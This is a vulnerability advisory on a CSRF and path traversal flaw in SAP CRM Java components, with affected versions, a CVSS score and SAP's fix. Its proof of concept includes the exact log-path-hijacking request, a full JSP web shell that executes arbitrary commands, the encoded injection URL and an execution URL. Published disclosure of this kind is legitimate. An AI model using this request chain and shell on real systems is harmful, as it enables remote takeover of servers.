February 16, 2018

[ERPSCAN-18-004] RCE via path Traversal using CSRF in SAP CRM

CSRF vulnerability, SAP NetWeaver Security

Application: SAP NetWeaver
Versions Affected: SAP CRM 13676083
Vendor URL: SAP
Bugs: CSRF, Path Traversal
Reported: 05.10.2017
Vendor response: 06.10.2017
Date of Public Advisory: 13.02.2018
Reference: SAP Security Note 2547431
Author: Vahagn Vardanyan (ERPScan), Vladimir Egorov (ERPScan)

VULNERABILITY INFORMATION

Class: Directory Traversal
Risk: Medium
Impact: Attacker could read content of arbitrary files on the remote server and expose sensitive data confidentiality
Remotely Exploitable: Yes
Locally Exploitable: Yes

CVSS Information

CVSS v3 Base Score: 6.6 / 10
CVSS Base v3 Base Vector:

AV: Attack Vector (Related exploit range)	Network (N)
AC: Attack Complexity (Required attack complexity)	Low (L)
PR: Privileges Required (Level of privileges needed to exploit)	High (H)
UI: User Interaction (Required user participation)	None (N)
S: Scope (Change in scope due to impact caused to components beyond the vulnerable component)	Changed (C)
C: Impact to Confidentiality	Low (L)
I: Impact to Integrity	Low (L)
A: Impact to Availability	Low (L)

DESCRIPTION

An attacker can change the path and extension of the log file in SAP CRM using path Traversal and CSRF vulnerability, write the special Java code in this log file, and execute any command via HTTP request.

BUSINESS RISK

An attacker can use a Cross-Site Request Forgery vulnerability for exploiting an authenticated user’s session by making a request containing a certain URL and specific parameters. A function will be executed with an authenticated user’s rights. An attacker may use a Cross-Site Scripting vulnerability to achieve this or can present a specially crafted link to an attacked user.

VULNERABLE PACKAGES

CRM JAVA APPLICATIONS 7.01 SP009
CRM JAVA APPLICATIONS 7.02 SP004
CRM JAVA APPLICATIONS 7.30 SP012
CRM JAVA APPLICATIONS 7.31 SP009
CRM JAVA APPLICATIONS 7.32 SP004
CRM JAVA APPLICATIONS 7.33 SP000
CRM JAVA APPLICATIONS 7.54 SP001
CRM JAVA COMPONENTS 7.01 SP009
CRM JAVA COMPONENTS 7.02 SP004
CRM JAVA COMPONENTS 7.30 SP012
CRM JAVA COMPONENTS 7.31 SP009
CRM JAVA COMPONENTS 7.32 SP004
CRM JAVA COMPONENTS 7.33 SP000
CRM JAVA COMPONENTS 7.54 SP001
CRM JAVA WEB COMPONENTS 7.01 SP009
CRM JAVA WEB COMPONENTS 7.02 SP004
CRM JAVA WEB COMPONENTS 7.30 SP012
CRM JAVA WEB COMPONENTS 7.31 SP009
CRM JAVA WEB COMPONENTS 7.32 SP004
CRM JAVA WEB COMPONENTS 7.33 SP000

SOLUTIONS AND WORKAROUNDS

To correct this vulnerability, install SAP Security Note 2547431

TECHNICAL DESCRIPTION

Proof of Concept

Path Traversal

Using this path traversal an attacker can change CRM log path.

POST /b2b/admin/logging.jsp HTTP/1.1
Host: 172.16.10.65:50001
Connection: close
Content-Length: 302
Cache-Control: max-age=0
Origin: https://172.16.10.65:50001
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36 OPR/47.0.2631.71
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: https://172.16.10.65:50001/b2b/admin/logging.jsp?location=com.sap.isa&mode=edit&index=1
Accept-Encoding: gzip, deflate, br
Accept-Language: ru-RU,ru;q=0.8,en-US;q=0.6,en;q=0.4
Cookie: 

xsrfid=1&selConfigName=com.sap.isa&selSeverity=0&selDest=C:\usr\sap\DM0\J00\j2ee\cluster\apps\sap.com\com.sap.engine.docs.examples\servlet_jsp\_default\root\shell.jsp&selLimit=10485760&selCount=20&selFormatterType=ListFormat&selPattern=none&mode=save&selLocationIdx=1

POST /b2b/admin/logging.jsp HTTP/1.1

Host: 172.16.10.65:50001

Connection: close

Content-Length: 302

Cache-Control: max-age=0

Origin: https://172.16.10.65:50001

Upgrade-Insecure-Requests: 1

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36 OPR/47.0.2631.71

Content-Type: application/x-www-form-urlencoded

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8

Referer: https://172.16.10.65:50001/b2b/admin/logging.jsp?location=com.sap.isa&mode=edit&index=1

Accept-Encoding: gzip, deflate, br

Accept-Language: ru-RU,ru;q=0.8,en-US;q=0.6,en;q=0.4

Cookie:

xsrfid=1&selConfigName=com.sap.isa&selSeverity=0&selDest=C:\usr\sap\DM0\J00\j2ee\cluster\apps\sap.com\com.sap.engine.docs.examples\servlet_jsp\_default\root\shell.jsp&selLimit=10485760&selCount=20&selFormatterType=ListFormat&selPattern=none&mode=save&selLocationIdx=1

There is an authorization mechanism here, but there is no CSRF token (in configuration panel we enabled CSRF protection).

Uploading RCE

After creating an evil log file, an attacker can send this request with jsp shell to server, and server writes C:\usr\sap\DM0\J00\j2ee\cluster\apps\sap.com\com.sap.engine.docs.examples\servlet_jsp\_default\root\shell.jsp file this jsp code

<%@ page import="java.util.*,java.io.*"%><% if (request.getParameter("cmd") != null){Process p = Runtime.getRuntime().exec(request.getParameter("cmd"));OutputStream os = p.getOutputStream(); InputStream in = p.getInputStream(); DataInputStream dis = new DataInputStream(in); String disr = dis.readLine(); out.println("<PRE>"); while ( disr != null ) {out.println(disr);disr =dis.readLine();}out.println("</PRE>");} %>

<%@ page import="java.util.*,java.io.*"%><% if (request.getParameter("cmd") != null){Process p = Runtime.getRuntime().exec(request.getParameter("cmd"));OutputStream os = p.getOutputStream(); InputStream in = p.getInputStream(); DataInputStream dis = new DataInputStream(in); String disr = dis.readLine(); out.println("<PRE>"); while ( disr != null ) {out.println(disr);disr =dis.readLine();}out.println("</PRE>");} %>

https://172.16.10.65:50001/b2b/init.do?"]%3c%25%40+page+import%3d"java.util.*,java.io.*"%25>%3c%25+if+(request.getParameter("cmd")+!%3d+null){Process+p+%3d+Runtime.getRuntime().exec(request.getParameter("cmd"))%3bOutputStream+os+%3d+p.getOutputStream()%3b+InputStream+in+%3d+p.getInputStream()%3b+DataInputStream+dis+%3d+new+DataInputStream(in)%3b+String+disr+%3d+dis.readLine()%3b+out.println("<PRE>")%3b+while+(+disr+!%3d+null+)+{out.println(disr)%3bdisr+%3ddis.readLine()%3b}out.println("</PRE>")%3b}+%25>["#

https://172.16.10.65:50001/b2b/init.do?"]%3c%25%40+page+import%3d"java.util.*,java.io.*"%25>%3c%25+if+(request.getParameter("cmd")+!%3d+null){Process+p+%3d+Runtime.getRuntime().exec(request.getParameter("cmd"))%3bOutputStream+os+%3d+p.getOutputStream()%3b+InputStream+in+%3d+p.getInputStream()%3b+DataInputStream+dis+%3d+new+DataInputStream(in)%3b+String+disr+%3d+dis.readLine()%3b+out.println("<PRE>")%3b+while+(+disr+!%3d+null+)+{out.println(disr)%3bdisr+%3ddis.readLine()%3b}out.println("</PRE>")%3b}+%25>["#

Executing RCE

https://172.16.10.65:50001/shell.0.jsp?cmd=ipconfig

1	https://172.16.10.65:50001/shell.0.jsp?cmd=ipconfig